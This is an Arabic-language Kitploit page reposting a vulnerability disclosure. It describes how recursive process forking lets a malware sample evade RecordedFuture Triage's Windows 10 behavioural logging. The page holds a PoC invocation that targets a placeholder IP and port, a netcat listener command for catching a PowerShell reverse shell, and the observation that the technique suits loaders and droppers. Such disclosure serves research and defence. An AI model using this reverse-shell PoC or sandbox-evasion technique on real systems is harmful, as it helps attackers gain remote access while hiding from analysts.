Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-61303 — ثغرة أمنية حرجة (9.8) - قد يفشل محرك التحليل الديناميكي في RecordedFuture Triage في تسجيل السلوك الضار عندما تنتج العينات عمليات تفرع (forking) عالية الحجم بشكل متكرر، مما يؤدي إلى تقارير سلوكية غير متسقة أو مفقودة. | Kitploit
أدوات/GitHubGitHub/egkritsis/cve-2025-61303
التحليل الديناميكي (عزل)تحليل الثغرات الأمنيةالاستغلالتحليل البرمجيات الخبيثةالأوراق والأبحاثالتعلم والتعليم
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

ثغرة أمنية حرجة (9.8) - قد يفشل محرك التحليل الديناميكي في RecordedFuture Triage في تسجيل السلوك الضار عندما تنتج العينات عمليات تفرع (forking) عالية الحجم بشكل متكرر، مما يؤدي إلى تقارير سلوكية غير متسقة أو مفقودة.

عرض المستودع
24منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-61303 - RecordedFuture Triage: حرمان التحليل عبر التفرع التكراري للعمليات

الوصف

يحتوي صندوق تحليل RecordedFuture Triage على نظامي Windows 10 build 2004 وWindows 10 LTSC 2021 على ثغرة حرجة في محرك التحليل السلوكي لنظام Windows، والتي تسمح لعينة برمجية خبيثة مُرسلة بتجنب الاكتشاف والتسبب في حرمان التحليل. تُستغل الثغرة عندما تفرخ العينة بشكل متكرر عددًا كبيرًا من العمليات الفرعية، مما يولد حجم سجلات مرتفعًا ويستنزف موارد النظام. ونتيجة لذلك، قد لا يتم تسجيل أو الإبلاغ عن السلوك الخبيث الرئيسي، بما في ذلك تنفيذ PowerShell ونشاط الصدفة العكسية، مما يضلل المحللين ويعرض سلامة وتوافر نتائج التحليل في بيئة العزل للخطر.


درجة CVSS

CVSS v3.1: 9.8 (حرجة)
المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


المؤلفون / الباحثون

  • Evgenios Gkritsis — قسم المعلوماتية، جامعة أثينا للاقتصاد والأعمال، اليونان
  • Constantinos Patsakis — قسم المعلوماتية، جامعة بيرايوس، اليونان
  • George Stergiopoulos — قسم المعلوماتية، جامعة أثينا للاقتصاد والأعمال، اليونان

التفاصيل

تُظهر العينة vathos_rev.exe (SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) حالة حرمان التحليل في محرك التحليل السلوكي لنظام Windows في RecordedFuture Triage.
عند إطلاقها تحت تكوينات Windows 10، تفرخ العينة آلاف العمليات الفرعية بشكل متكرر، مما يستنزف موارد تتبع العمليات والتسجيل. ونتيجة لذلك، يقدم صندوق التحليل بيانات سلوكية ضئيلة ويفشل في تسجيل الإجراءات الخبيثة الرئيسية.


بيئة Windows 10 v2004

  • المنصة: win10v2004-20250610-en
  • البنية: x64
  • الحد الأقصى لوقت النواة: 104s
  • الحد الأقصى لوقت الشبكة: 213s
  • النتيجة السلوكية المُبلغ عنها: 1/10
  • التوقيع المكتشف: “الاستخدام المشبوه لـ WriteProcessMemory” (64 مؤشر اختراق)
  • السلوك الملاحَظ:
    • تكرار العمليات باستمرار لـ vathos_rev.exe
    • لم يُسجل أي تنفيذ لـ PowerShell أو نشاط صدفة عكسية
    • حركة شبكة محدودة (طلبات DNS وHTTP القياسية فقط)
    • لم يتم التقاط أي استدعاءات C2 أو بيانات قياس عن بعد للحمولة

بيئة Windows 10 LTSC 2021

  • المنصة: win10ltsc2021-20250619-en
  • البنية: x64
  • الحد الأقصى لوقت النواة: 105s
  • الحد الأقصى لوقت الشبكة: 215s
  • النتيجة السلوكية المُبلغ عنها: 1/10
  • التوقيع المكتشف: “الاستخدام المشبوه لـ WriteProcessMemory” (64 مؤشر اختراق)
  • نشاط العمليات الملاحَظ:
    • تكرار العمليات باستمرار لـ vathos_rev.exe
    • لم يُسجل أي تنفيذ لـ PowerShell أو نشاط صدفة عكسية
    • حركة شبكة محدودة (طلبات DNS وHTTP القياسية فقط)
    • لم يتم التقاط أي استدعاءات C2 أو بيانات قياس عن بعد للحمولة

عبر بيئتي صندوق تحليل Windows 10 معًا، فشل الإطلاق في التقاط مراحل تنفيذ PowerShell والصدفة العكسية المتوقعة على الرغم من قيام البرنامج الخبيث بتنفيذ هذه السلوكيات على المضيف.

أصبح محرك التحليل السلوكي في صندوق التحليل مشبعًا بسبب التفرع التكراري للعمليات، مما أدى إلى بيانات قياس عن بعد مبتورة أو مفقودة.

يؤكد هذا ثغرة حرمان التحليل، إذ يفشل المحرك السلوكي في الإبلاغ عن النشاط الخبيث في ظل التكرار العالي وحجم السجلات الكبير، مما يؤدي إلى نتائج سلبية كاذبة ومخرجات جنائية غير مكتملة.

مرجع التقرير العام:
https://tria.ge/250822-qfystshk51


التأثير

هذه ثغرة حرمان التحليل في RecordedFuture Triage يمكن أن تتسبب في فشل محرك التحليل الديناميكي في التقاط النشاط السلوكي أو الإبلاغ عنه. يسمح استغلالها للخصوم بتجاوز الكشف السلوكي وإنتاج تقارير تحليل غير مكتملة أو مفقودة.

التأثيرات الرئيسية

  • تجنب الكشف: قد لا يتم تسجيل السلوك الخبيث، مما يجعل التهديدات تبدو حميدة.
  • ثقة زائفة: التحليلات ذات النتائج المنخفضة مع بيانات قياس عن بعد مفقودة يمكن أن تضلل المحللين.
  • تجنب قابل لإعادة الاستخدام: يمكن دمج التقنية في اللوادر/الموزعات (loaders/droppers) وإعادة استخدامها عبر الحملات.
  • سهولة الاستغلال: قابلة للتكرار دون خبرة عميقة، مما يزيد من خطر إساءة الاستخدام على نطاق واسع.

التبعات النهائية

  • فقدان مؤشرات الاختراق (IOCs)
  • سوء تصنيف التهديدات المتقدمة
  • جداول زمنية جنائية غير مكتملة

المنتجات المتأثرة

  • المنتج: RecordedFuture Triage (منصة التحليل الديناميكي)
  • المكوّن المتأثر: محرك التحليل السلوكي لنظام Windows
  • عينة البرمجية الخبيثة: vathos_rev.exe
    • SHA256: 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
    • MD5: dca2fc8f69f6493c7a9c1ce9a68b2454
    • SHA1: 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
    • SHA512: 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
    • الحجم: 270 KB

عمليات الإطلاق المتأثرة الملاحَظة (تقارير Triage العامة)

بيئة Windows 10 LTSC 2021

  • معرّف التقرير: 250822-qfystshk51
  • المنصة: win10ltsc2021-20250619-en
  • البنية: x64
  • التقديم: 2025-08-22 13:12 UTC
  • الإبلاغ: 2025-08-22 13:18 UTC

بيئة Windows 10 الإصدار 2004

  • معرّف التقرير: 250822-qfystshk51
  • المنصة: win10v2004-20250610-en
  • البنية: x64
  • التقديم: 2025-08-22 13:12 UTC
  • الإبلاغ: 2025-08-22 13:18 UTC

ملاحظة: لا يكشف RecordedFuture علنًا عن تفاصيل بناء المحرك والإصدار الداخلي.
تستند جميع الملاحظات إلى عمليات إطلاق عامة قابلة للتكرار من منصة Triage التابعة لـ RecordedFuture (الإرسال 250822-qfystshk51).


إثبات المفهوم (PoC)

الملخص (موجز)

يعيد العرض التوضيحي المقدم إنتاج حالة حرمان التحليل (DoA) عن طريق توليد حجم عمليات مرتفع جدًا ونشاط زمن تنفيذ متداخل بعمق. يفرخ العرض التوضيحي العديد من العمليات الفرعية وينفذ فك تشفير XOR متعدد الجولات قبل مرحلة الصدفة العكسية النهائية عبر PowerShell. في بيئات Triage المتأثرة على Windows 10، لا يتم تسجيل مرحلة الحمولة النهائية أو يتم اقتطاعها، بينما تلتقط بيئات أخرى (مثل Windows 11) السلوك الكامل.

طريقة التشغيل

root@kitploit:~
poc/vathos_demo.exe <IP> <PORT>

ابدأ مستمعًا (مثل nc -lvp 4444) على عنوان IP/المنفذ المحدد لملاحظة محاولات الاتصال. يفرخ العرض التوضيحي عددًا كبيرًا جدًا من العمليات وينفذ فك تشفير XOR متعدد الجولات، ليبلغ ذروته في مرحلة صدفة عكسية عبر PowerShell. في تكوينات Triage المتأثرة، قد لا يتم تسجيل مرحلة الحمولة النهائية على الرغم من قيام العينة بتنفيذها على المضيف.

الشكل 1 - لوحة نظرة عامة على Triage الشكل 1 - لوحة نظرة عامة على Triage

الشكل 2 - تقرير السلوك لنظام Windows 10 v2004 (بيانات قياس عن بعد ضئيلة / مثال DoA) الشكل 2 - تقرير win10 v2004 (بيانات قياس عن بعد ضئيلة)

الشكل 3 - تقرير السلوك لنظام Windows 10 LTSC 2021 (بيانات قياس عن بعد ضئيلة / مثال DoA) الشكل 3 - تقرير win10 LTSC 2021 (بيانات قياس عن بعد ضئيلة)

الشكل 4 - مثال على العمليات المسجلة في Windows 10 LTSC (منقّح، وليست كل العمليات مسجلة) — سجلات التحليل ← العمليات الشكل 4 - العمليات المسجلة في win10 LTSC (منقّح)


المراجع

  • تحليل Triage العام: https://tria.ge/250822-qfystshk51
  • https://www.cve.org/CVERecord?id=CVE-2025-61303

تنزيل الأداة